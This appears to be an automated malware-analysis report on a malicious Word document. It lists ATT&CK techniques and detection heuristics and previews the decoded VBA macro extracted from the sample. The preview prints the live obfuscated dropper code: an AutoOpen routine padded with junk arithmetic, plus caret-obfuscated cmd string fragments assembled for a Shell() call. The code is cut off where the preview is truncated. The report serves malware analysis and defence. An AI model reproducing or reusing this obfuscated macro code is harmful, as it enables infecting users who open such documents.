MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro utilizes a Shell() call, indicating an attempt to execute arbitrary code. While the specific payload is obfuscated, the presence of the Shell() call and the AutoOpen macro strongly suggests the document is designed to download and execute a second-stage payload.
Heuristics (6)

- ClamAV: Doc.Malware.00536d-6704725-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6704725-0
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 92673 bytes |

SHA-256 of macros.bas: 05f69ac3e4aa3db44c874b48a1894d755b11ab27f2f0403d09429e1cbbaea376

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "HTcojPoTOPX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If KXsQqW Or zCfiw Then
Dim WmYBwV(3)
WmYBwV(0) = MmNMwi + 81550
WmYBwV(1) = 29721 + BYhczw + 71176 + 71291
WmYBwV(2) = 66500 + QGYju
End If
If UwnoCQ >= WijVK Then
Dim JmJHHt(4)
JmJHHt(0) = 34352 + wPnnzp
JmJHHt(1) = jUnTFN + whHpHX
JmJHHt(2) = 37509 + AUsnm + tlHXw + WizADa
JmJHHt(3) = mOwCF + UpbzR + tRiPTu + Dlqif
End If
If PSOiG = jzhBER Then
Dim PRXSmp(1)
PRXSmp(0) = ChnTfG + XmwfQH
End If
If Cbtsf = 7 Then
Dim ukjLC(4)
ukjLC(0) = 13525 + lOYwqJ
ukjLC(1) = iiuCA + INkWoJ
ukjLC(2) = 81451 + 10622 + 28771 + YtKfIw
ukjLC(3) = 14211 + dzvmY + jazrb + jqslw
End If
If lMdlmr Eqv 3 Then
Dim bNIlSC(2)
bNIlSC(0) = sWFnR + qabRvV + AiQpJP + miDQEi
bNIlSC(1) = JNsoQ + 98790 + cHcoOu + LlLqQz
End If
If zSbCSi And ToimR Then
Dim MidiWM(4)
MidiWM(0) = WnBvU + asranj
MidiWM(1) = MQaMOj + OonFcd + wDiLu + JaJRji
MidiWM(2) = 41604 + VcOvF
MidiWM(3) = 77963 + wIQQp
End If
WVkbiRrjbQE (KeyString(BtSqncrm + jRMjC + 13 + 2 + 52 + HzUnZ + StFioGTt) + oVPKlEkL + EQskDGi + KeyString(aCbriX + JzRqmN + 15 + 2 + 60 + jBrWskbA + CAVihbj) + TWmifROXE + njqfYwziXL + YBwjC + tMLisfoCm + QuoUGnR + fTwXtZEw + rWFBpLMVtP + HJEIlMK + KmvwiATzX + AwSrqcp + tvUmGI)
If mzTzW = CtczS Then
Dim ZziWZj(2)
ZziWZj(0) = vCXbiK + 26024
ZziWZj(1) = ktIBB + wtOqh
End If
If LqsMZK Eqv omCuS Then
Dim EWzrJV(2)
EWzrJV(0) = 26800 + 82988 + fjTABJ + hpzjk
EWzrJV(1) = 58043 + 47556
End If
If blvCD = uqTpZ Then
Dim uznSo(3)
uznSo(0) = 61077 + LtZIN
uznSo(1) = ENviK + ziWijS + 77570 + FmchMj
uznSo(2) = nrLRww + FcBdh
End If
If MzIIOc < YPEAAD Then
Dim ZQswd(3)
ZQswd(0) = 38765 + VjQOc + dtjFkF + tnTYzG
ZQswd(1) = 27495 + cGRvu
ZQswd(2) = fLJjD + hqPrt + 74419 + IijwPu
End If
End Sub
Attribute VB_Name = "izmrbFTK"
Function TWmifROXE()
If iVBJdU Xor otOSTd Then
Dim TzjPBB(2)
TzjPBB(0) = 5828 + ZanAb
TzjPBB(1) = 78054 + dWNoQ
End If
If jHJiR <= 11 Then
Dim sSMVd(2)
sSMVd(0) = UizOXp + afiilk + 34557 + 90075
sSMVd(1) = HFnmk + dbDOzW + mDjEv + 76263
End If
If iflSj <> BZYuzO Then
Dim LGhqCt(3)
LGhqCt(0) = 9735 + KIsWJ
LGhqCt(1) = 88016 + whpicw + 47980 + CUBkbC
LGhqCt(2) = UwIqaz + NsuNz + Xtvaw + aqEUlc
End If
vwslC = "d /V^:^ON/C" + """" + "^s^" + "e^t ^S^O^Q=^mc^E^ I" + "^m/^ ^DZl^ N^W^~^ " + "^}^[a^ ^u^g^-^"
If ljcriz < HdziXH Then
Dim VbkdVv(1)
VbkdVv(0) = 51808 + ctqYP
End If
If iMZbG Or jYJUJt Then
Dim JDzRI(4)
JDzRI(0) = AmDnBw + PGjBJ + nDzkFw + mpDbI
JDzRI(1) = 23696 + HMZwZ + WrSbZ + iqiZo
JDzRI(2) = 16171 + YFPKS + UGGKic + ptHDhn
JDzRI(3) = 52975 + OvlXKh
End If
PwiwWcimR = " c^{^=^ W^O^E^" + " ^b4^\ ^J^w^;" + "^ ^y^H(^ ^>Z^D^" + " ^J^>)^ ^b]^m^ }{^L^" + " Y^'\^ ^=R^H^ ^_^j^" + "h^}/^i^Z^}^["
If KmOFvA < 12 Then
Dim RRlVG(3)
RRlVG(0) = 83675 + 53021
RRlVG(1) = 12509 + XPjNN + BRYnmq + 48149
RRlVG(2) = UNtwjt + HXPzN + GTTzk + JURId
End If
If QPSwn > sBGEEJ Then
Dim hjzvh(4)
hjzvh(0) = ifrAjR + JimHK
hjzvh(1) = 6838 + DuTJfB + PBajWj + OBYPzj
hjzvh(2) = 54564 + YPljc
hjzvh(3) = NPwtBN + nQqPf + SiRQKi + udOsK
End If
If fVDXz And 18 Then
Dim JBmbq(2)
JBmbq(0) = 41300 + mbkiA + sJtHw + wQskAG
JBmbq(1) = dujRMS + GiRsp + oMZTsj + 85587
End If
fzBJOqCiI = "^?^x^{^F^,%^h^B^" + "[vc^A^S^_^" + "t^W^-^,^a^*^@^\c%^"
If whIOSs Or 18 Then
Dim RINsr(2)
RINsr(0) = GQsUP + ruwEq
RINsr(1) = XPXDF + hRHHa + 28608 + fVbpL
End If
Wtsoj = ">^i^}^s^dx^;Xrn^k^" + "4^l^d^a8^T^_^" + "e^-^i^Mr^W^_r^b^#" + "^G^y^;^3^J^DG^S" + "^P^p^w^H^qT^" + "W(^#^1^$)^U/^ ^"
If PXRccQ <> 1 Then
Dim RNofqd(2)
RNofqd(0) = 68766 + Zuzpp + 82198 + SYNrM
RNofqd(1) = Tshid + 84303
End If
If Yzohus <> zclSUE Then
Dim pWRDk(2)
pWRDk(0) = FtPkEp + UHwMlw
pWRDk(1)
... (truncated)